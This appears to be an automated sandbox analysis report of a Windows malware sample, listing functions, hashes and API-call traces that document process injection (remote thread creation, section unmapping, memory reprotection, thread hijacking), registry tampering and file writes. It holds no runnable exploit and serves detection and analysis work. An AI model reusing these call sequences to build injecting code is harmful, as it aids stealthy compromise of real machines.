Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

